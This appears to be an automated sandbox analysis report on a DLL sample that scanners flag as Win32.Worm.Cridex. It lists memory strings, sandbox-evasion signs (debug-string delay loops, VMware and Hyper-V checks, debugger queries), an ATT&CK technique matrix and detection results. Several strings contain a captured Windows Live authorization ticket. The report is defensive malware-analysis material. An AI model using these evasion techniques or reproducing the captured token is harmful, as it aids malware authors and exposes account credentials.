Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000006.00000003.269438809.0000000002E16000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.268022167.0000000002E16000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbA. source: WerFault.exe, 00000006.00000003.273943910.0000000004F76000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000006.00000003.273931070.0000000004FA1000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E83F6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6E83F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1198

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1198

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E840730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6E840730

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: WerFault.exe, 00000006.00000002.300730624.0000000004D80000.00000004.00000001.sdmp	Binary or memory string: b22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=<WlidToken><Version>1.0</Version><Type>0</Type><AuthorizationToken><Flags>0</Flags><Ticket Type="urn:passport:compact">t=EwC4AlN5BAAUfXuGwOqhW7gpJJ36LAbhOJHjZ2kAAfy20W7WGr2H1Dd3s1L4CyDOlJhVjZKa310V3lmO8QvaAXeY4EeGZSzjy6P/rXiwk3ipb22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=</Ticket></AuthorizationToken></WlidToken>
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: WerFault.exe, 00000006.00000002.300730624.0000000004D80000.00000004.00000001.sdmp	Binary or memory string: t=EwC4AlN5BAAUfXuGwOqhW7gpJJ36LAbhOJHjZ2kAAfy20W7WGr2H1Dd3s1L4CyDOlJhVjZKa310V3lmO8QvaAXeY4EeGZSzjy6P/rXiwk3ipb22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=''https://watson.telemetry.microsoft.com
Source: WerFault.exe, 00000006.00000002.300618449.0000000004BA0000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.298385587.0000000004B9D000.00000004.00000001.sdmp	Binary or memory string: gpJJ36LAbhOJHjZ2kAAfy20W7WGr2H1Dd3s1L4CyDOlJhVjZKa310V3lmO8QvaAXeY4EeGZSzjy6P/rXiwk3ipb22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=
Source: WerFault.exe, 00000006.00000003.299584345.0000000004F50000.00000004.00000001.sdmp	Binary or memory string: e6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9Mx ;T6
Source: WerFault.exe, 00000006.00000002.300707776.0000000004C56000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.298409389.0000000004BB3000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.298362110.0000000004C56000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.300642542.0000000004BB3000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.298135731.0000000004C56000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000006.00000002.300618449.0000000004BA0000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.298385587.0000000004B9D000.00000004.00000001.sdmp	Binary or memory string: gpJJ36LAbhOJHjZ2kAAfy20W7WGr2H1Dd3s1L4CyDOlJhVjZKa310V3lmO8QvaAXeY4EeGZSzjy6P/rXiwk3ipb22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=MSDWKeep-Alive
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
Source: WerFault.exe, 00000006.00000003.298135731.0000000004C56000.00000004.00000001.sdmp	Binary or memory string: MSA_DeviceTickett=EwC4AlN5BAAUfXuGwOqhW7gpJJ36LAbhOJHjZ2kAAfy20W7WGr2H1Dd3s1L4CyDOlJhVjZKa310V3lmO8QvaAXeY4EeGZSzjy6P/rXiwk3ipb22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=
Source: WerFault.exe, 00000006.00000003.298362110.0000000004C56000.00000004.00000001.sdmp	Binary or memory string: ceTickett=EwC4AlN5BAAUfXuGwOqhW7gpJJ36LAbhOJHjZ2kAAfy20W7WGr2H1Dd3s1L4CyDOlJhVjZKa310V3lmO8QvaAXeY4EeGZSzjy6P/rXiwk3ipb22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: WerFault.exe, 00000006.00000003.298409389.0000000004BB3000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.300642542.0000000004BB3000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWZ
Source: WerFault.exe, 00000006.00000003.298362110.0000000004C56000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.298135731.0000000004C56000.00000004.00000001.sdmp	Binary or memory string: t=EwC4AlN5BAAUfXuGwOqhW7gpJJ36LAbhOJHjZ2kAAfy20W7WGr2H1Dd3s1L4CyDOlJhVjZKa310V3lmO8QvaAXeY4EeGZSzjy6P/rXiwk3ipb22QUZ75IJ0oxf8uXs8ORQTXAigDL/YBgFxxlWW337gwFSpqRrW7Dm/pkMMyleiJcRpTb5Kjzq0y7BPtkA4ocCKlrIQ7Va2TuRRwF3k5ASuviPY9IvyzzFOX/TfTx3gYkP0gwxQvUFe2WOzL30PIraXbKi9hRCAf5GAeXP2C/9FmM1rIsqMJ/apH69q14qvL9DHMOHe6fJGyUCWWVmnO5Hx1tnBmQMBjYtV4/5Mh63P6WDNc4OGdKTWUA/JWZrCq5UW5c882LNEa0BiwQjUDZgAACN/Vp1vg4nFTiAG4Lg5QwFRZaKsCfv4AgLKfm7J9ObZmFxjfl4duRxk4nY/MJzFhGFSe7ubN/TpYPRjQ3lmszvxiBiRiCAO+CbX115XXe9ZLwr3hY3t7Bef5AiNuwmZXUfpjY4Cfho5lgDEHHH4plkDQ7UFtGZ24pKrQRdcPmcCZH58oSw3HEyDJJ7+eLgNKAAyAhn53zud4F+84JwS07NF43VwxynI5fr9AOiNXikdtd2J60pExA7yxO+5Sz19bZt9MS5ScJzfC5G2kngfkEL0Evm7f1+aA5+KIXGqOzoSoR1RHE7CceBIlKiuIz3cZdB4GZ2JiTF5+ZrQ46aLGtIPpLWEGhIJdSz64r5A1N47484WaWlGEIHCvjbysSrvrKBF+OxIZhy6Zi/TbMuuIT/kPQ1IvYZfTstWnF1BeTbh19zuQIyrKkowCpMuMMyhvU4OGWllsNUOTJpSuKD79LekJTH00kiZ/xyJ7v5mHgd4PanmPE+7R7gg0wq6zMycNrgRe98aqXOvFQHvLO8XpmoeCyrYB&p=
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E836D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E836D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E843138 RtlAddVectoredExceptionHandler,

0_2_6E843138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.653930606.00000000016C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.263678676.00000000038C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260831521.00000000038C0000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000000.00000002.653930606.00000000016C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.263678676.00000000038C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260831521.00000000038C0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.653930606.00000000016C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.263678676.00000000038C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260831521.00000000038C0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.653930606.00000000016C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.263678676.00000000038C0000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260831521.00000000038C0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E836D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6E836D0C

Source: Amcache.hve.6.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	23%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	26%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.6e830000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.3220000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.3220000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.rundll32.exe.6e830000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.2.rundll32.exe.3220000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.f60000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
